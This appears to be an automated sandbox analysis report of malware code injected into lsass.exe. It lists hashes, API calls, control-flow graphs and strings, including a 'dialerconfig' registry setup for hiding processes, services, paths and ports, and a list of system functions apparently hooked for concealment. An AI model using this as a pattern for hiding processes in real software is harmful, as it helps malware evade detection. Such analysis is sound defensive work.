                                                                          • Instruction ID: 006047059f567fc424369bd4eaabb636d5541b44e56c09e15fbbbd16066aee87
                                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction Fuzzy Hash: 6E71173624078185EB26DF2BD8407EAA790F38D7A4F640126DF0D5BBA9DE34CE45C382

                                                                          Control-flow Graph

Control-flow graph for the function at 0x140ae86202c (calls 0x140ae882d00, 0x140ae862f04, 0x140ae861bbc, 0x140ae861bf4 and StrCmpNIW); the rendered graph is not reproduced here.
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: S$dialer
                                                                          • API String ID: 756756679-3873981283
                                                                          • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                          • Instruction ID: 6995ce01178be5ec7128772deebd1550e485b351504c4b94060f668f1040f1af
                                                                          • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                          • Instruction Fuzzy Hash: 6E51BE32B5572486EB62CB2BA8406EDA3F5F7087A4F249451DF0D13BA5DB35DC91C382

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: c3158435ef4687b1766e3257663a9035ab9b0d40d8f3ba1c44d0f0f8ec37f8a1
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 7DF03C3274474192EB618B22E9847996760F74CBE9FA44020DF4D47979DE3DCA8DCB41

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: 3ba806e3e51b1b0dcb359024cf54f050519727a8cf8c5b8b8f5a43b5e8428739
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: BA115E30A9478082F7639B23B9153D922D4B79C765FB041249F4E875B1EF78C844C2C2

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00000140AE861628: GetProcessHeap.KERNEL32 ref: 00000140AE861633
                                                                            • Part of subcall function 00000140AE861628: HeapAlloc.KERNEL32 ref: 00000140AE861642
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616B2
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616DF
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8616F9
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861719
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861734
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861754
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86176F
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86178F
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617AA
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617CA
                                                                          • Sleep.KERNEL32 ref: 00000140AE861AD7
                                                                          • SleepEx.KERNEL32 ref: 00000140AE861ADD
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617E5
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861805
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861820
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861840
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86185B
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86187B
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861896
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8618A0
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: 326f40d2db6ff263f8e0a940b391fb73a78b65f37836ebd93bce5d4d1fbe3847
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: 2631CC7128074181FF529B27DA513E963A5AB8CBE4F2858219F1E877B7EF34CC51C292

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 06fb5e1ef4416040f010e1a7d6ba73e71e6e03eebacef6a42692c0d9d5c867cd
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 10610732B2179887DB65CF1690407AE7393FB58B98F688121DF5907BD4DA38D863E700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: bf2ef32ac57e5f465ce725a7a74baab9ea04f71ed1d086599ba6561ce8fa9f42
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: 2AB19E72250B5486EB668F2BD4407E9A3A5FB48BA4F645066EF4D53BB5DF34CC40C382
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 1503c4d1f0e9a2face0525283fdd9087e61cbfeab21d2c89dc1035b309a16709
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: 2131A372245B808AEB618F61E8407ED7361F788754F64442ADF4D47BA8EF38C948C790
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: f4b3617ef55b8c279f228a1357564ad9138b4f9cc27f1e8a361b5862f6d2fb0c
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 9C314E32654B8086EB619F26E8403DE73A4F789764F600125EF9D47BB8EF38C945CB81

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 4cb465b735a6020238bf1ea048d5c89955278629e63a0cab2664c088472f563d
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 5771E736750B10C6EB129F66E8906D933A5FB89BA8F201121DF4E97B79DF38C844C781

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: eaf29793312f880262aa33c4d225e9377ef8ac7c3781aeeffa93a87445d713dc
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: B5516C32640B8486EB56CF62E54839AB7A1F78DBA9F244124DF4D07B29DF3CC445C791

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 2267be31c3c8b37de2fa04f2787d19f37c5545ab8d6e24567a23a1f44e334d39
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: 3531A574580B4AA0EA07EB6BE8516E47321BB5D3B4FF05413AE0D131B69F788E49C3D2

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 79a856343edf9d6588f3d0cd2b4f253cfe509a1624521d714eea0eda72951458
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: FC81E23162834987F656AB6798403DB72A3EF8D784F3440259B69477B6DB38C867B300

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 00000140AE86CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEBC
                                                                          • SetLastError.KERNEL32 ref: 00000140AE86CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000140AE86ECCC,?,?,?,?,00000140AE86BF9F,?,?,?,?,?,00000140AE867AB0), ref: 00000140AE86CF2C
                                                                            • Part of subcall function 00000140AE86D6CC: HeapAlloc.KERNEL32 ref: 00000140AE86D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF54
                                                                            • Part of subcall function 00000140AE86D744: HeapFree.KERNEL32 ref: 00000140AE86D75A
                                                                            • Part of subcall function 00000140AE86D744: GetLastError.KERNEL32 ref: 00000140AE86D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF76
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: b2b40885048b18a77dd749f130d094d7928ae544b3603784d23cb63539606b23
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 0941183028174441FA6BAB6799553E922926B5C7B0F744B24AF3E4B6F6DE789C01C2C3

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: d526e0782f541ea269add2dfc30b9375b8e19e2713657146a865421fd34f2e67
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: FB213936654B40C2EB11CB26E54839A77A1F789BA4F600215EF5D03BB8CF3CC949CB41

                                                                          Control-flow Graph

                                                                          control_flow_graph 584 140adfc9944-140adfc99ac call 140adfca814 587 140adfc99b2-140adfc99b5 584->587 588 140adfc9e13-140adfc9e1b call 140adfcbb48 584->588 587->588 589 140adfc99bb-140adfc99c1 587->589 591 140adfc99c7-140adfc99cb 589->591 592 140adfc9a90-140adfc9aa2 589->592 591->592 596 140adfc99d1-140adfc99dc 591->596 594 140adfc9aa8-140adfc9aac 592->594 595 140adfc9d63-140adfc9d67 592->595 594->595 597 140adfc9ab2-140adfc9abd 594->597 599 140adfc9d69-140adfc9d70 595->599 600 140adfc9da0-140adfc9daa call 140adfc8a34 595->600 596->592 598 140adfc99e2-140adfc99e7 596->598 597->595 602 140adfc9ac3-140adfc9aca 597->602 598->592 603 140adfc99ed-140adfc99f7 call 140adfc8a34 598->603 599->588 604 140adfc9d76-140adfc9d9b call 140adfc9e1c 599->604 600->588 610 140adfc9dac-140adfc9dcb call 140adfc6d40 600->610 607 140adfc9c94-140adfc9ca0 602->607 608 140adfc9ad0-140adfc9b07 call 140adfc8e10 602->608 603->610 618 140adfc99fd-140adfc9a28 call 140adfc8a34 * 2 call 140adfc9124 603->618 604->600 607->600 611 140adfc9ca6-140adfc9caa 607->611 608->607 622 140adfc9b0d-140adfc9b15 608->622 615 140adfc9cac-140adfc9cb8 call 140adfc90e4 611->615 616 140adfc9cba-140adfc9cc2 611->616 615->616 629 140adfc9cdb-140adfc9ce3 615->629 616->600 621 140adfc9cc8-140adfc9cd5 call 140adfc8cb4 616->621 652 140adfc9a48-140adfc9a52 call 140adfc8a34 618->652 653 140adfc9a2a-140adfc9a2e 618->653 621->600 621->629 626 140adfc9b19-140adfc9b4b 622->626 631 140adfc9c87-140adfc9c8e 626->631 632 140adfc9b51-140adfc9b5c 626->632 633 140adfc9ce9-140adfc9ced 629->633 634 140adfc9df6-140adfc9e12 call 140adfc8a34 * 2 call 140adfcbaa8 629->634 631->607 631->626 632->631 635 140adfc9b62-140adfc9b7b 632->635 637 140adfc9cef-140adfc9cfe call 140adfc90e4 633->637 638 140adfc9d00 633->638 634->588 639 140adfc9c74-140adfc9c79 635->639 640 140adfc9b81-140adfc9bc6 call 140adfc90f8 * 2 635->640 648 140adfc9d03-140adfc9d0d call 140adfca8ac 637->648 
638->648 644 140adfc9c84 639->644 665 140adfc9bc8-140adfc9bee call 140adfc90f8 call 140adfca038 640->665 666 140adfc9c04-140adfc9c0a 640->666 644->631 648->600 663 140adfc9d13-140adfc9d61 call 140adfc8d44 call 140adfc8f50 648->663 652->592 669 140adfc9a54-140adfc9a74 call 140adfc8a34 * 2 call 140adfca8ac 652->669 653->652 657 140adfc9a30-140adfc9a3b 653->657 657->652 662 140adfc9a3d-140adfc9a42 657->662 662->588 662->652 663->600 684 140adfc9c15-140adfc9c72 call 140adfc9870 665->684 685 140adfc9bf0-140adfc9c02 665->685 673 140adfc9c0c-140adfc9c10 666->673 674 140adfc9c7b 666->674 690 140adfc9a8b 669->690 691 140adfc9a76-140adfc9a80 call 140adfca99c 669->691 673->640 675 140adfc9c80 674->675 675->644 684->675 685->665 685->666 690->592 694 140adfc9a86-140adfc9def call 140adfc86ac call 140adfca3f4 call 140adfc88a0 691->694 695 140adfc9df0-140adfc9df5 call 140adfcbaa8 691->695 694->695 695->634
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: 610288a21bba7234f961b83c38f566fdeb512e40ac2c0f228fa86b943482e177
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: 21E1AE726247488BEB62DB26D4803DE37B3FB49B89F200115EF8957BA5DB34C1A2D700

                                                                          Control-flow Graph

                                                                          control_flow_graph 705 140ae86a544-140ae86a5ac call 140ae86b414 708 140ae86a5b2-140ae86a5b5 705->708 709 140ae86aa13-140ae86aa1b call 140ae86c748 705->709 708->709 710 140ae86a5bb-140ae86a5c1 708->710 712 140ae86a5c7-140ae86a5cb 710->712 713 140ae86a690-140ae86a6a2 710->713 712->713 717 140ae86a5d1-140ae86a5dc 712->717 715 140ae86a963-140ae86a967 713->715 716 140ae86a6a8-140ae86a6ac 713->716 718 140ae86a9a0-140ae86a9aa call 140ae869634 715->718 719 140ae86a969-140ae86a970 715->719 716->715 720 140ae86a6b2-140ae86a6bd 716->720 717->713 721 140ae86a5e2-140ae86a5e7 717->721 718->709 731 140ae86a9ac-140ae86a9cb call 140ae867940 718->731 719->709 722 140ae86a976-140ae86a99b call 140ae86aa1c 719->722 720->715 724 140ae86a6c3-140ae86a6ca 720->724 721->713 725 140ae86a5ed-140ae86a5f7 call 140ae869634 721->725 722->718 728 140ae86a894-140ae86a8a0 724->728 729 140ae86a6d0-140ae86a707 call 140ae869a10 724->729 725->731 739 140ae86a5fd-140ae86a628 call 140ae869634 * 2 call 140ae869d24 725->739 728->718 732 140ae86a8a6-140ae86a8aa 728->732 729->728 744 140ae86a70d-140ae86a715 729->744 736 140ae86a8ac-140ae86a8b8 call 140ae869ce4 732->736 737 140ae86a8ba-140ae86a8c2 732->737 736->737 753 140ae86a8db-140ae86a8e3 736->753 737->718 743 140ae86a8c8-140ae86a8d5 call 140ae8698b4 737->743 773 140ae86a62a-140ae86a62e 739->773 774 140ae86a648-140ae86a652 call 140ae869634 739->774 743->718 743->753 745 140ae86a719-140ae86a74b 744->745 750 140ae86a887-140ae86a88e 745->750 751 140ae86a751-140ae86a75c 745->751 750->728 750->745 751->750 754 140ae86a762-140ae86a77b 751->754 755 140ae86a9f6-140ae86aa12 call 140ae869634 * 2 call 140ae86c6a8 753->755 756 140ae86a8e9-140ae86a8ed 753->756 758 140ae86a874-140ae86a879 754->758 759 140ae86a781-140ae86a7c6 call 140ae869cf8 * 2 754->759 755->709 760 140ae86a900 756->760 761 140ae86a8ef-140ae86a8fe call 140ae869ce4 756->761 764 140ae86a884 758->764 786 140ae86a804-140ae86a80a 
759->786 787 140ae86a7c8-140ae86a7ee call 140ae869cf8 call 140ae86ac38 759->787 769 140ae86a903-140ae86a90d call 140ae86b4ac 760->769 761->769 764->750 769->718 784 140ae86a913-140ae86a961 call 140ae869944 call 140ae869b50 769->784 773->774 778 140ae86a630-140ae86a63b 773->778 774->713 790 140ae86a654-140ae86a674 call 140ae869634 * 2 call 140ae86b4ac 774->790 778->774 783 140ae86a63d-140ae86a642 778->783 783->709 783->774 784->718 794 140ae86a80c-140ae86a810 786->794 795 140ae86a87b 786->795 806 140ae86a815-140ae86a872 call 140ae86a470 787->806 807 140ae86a7f0-140ae86a802 787->807 811 140ae86a676-140ae86a680 call 140ae86b59c 790->811 812 140ae86a68b 790->812 794->759 796 140ae86a880 795->796 796->764 806->796 807->786 807->787 815 140ae86a686-140ae86a9ef call 140ae8692ac call 140ae86aff4 call 140ae8694a0 811->815 816 140ae86a9f0-140ae86a9f5 call 140ae86c6a8 811->816 812->713 815->816 816->755
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: 7b4ba636362c0b5caa681dd8b7c7e919a21c7b74d1dcc59cd2284cb1c0ce2a62
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 80E1B5726447408AEB62DF66D4803DD77A0F74DBA8F200156EF9D57BA9CB38C881D782
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 54f3c5caea9a3c542447f16078fc342d6fc1075fabbd0ba72b9af9b604dcfd33
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 0A41AE32391B0082EB27CF17A9047D56391BB4DBB0F7945259E0E97BA4EE38CC45D392
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: f351be34048a7ac2b0398fd5e5befab81f97ba1f80314118af7c8759807b7470
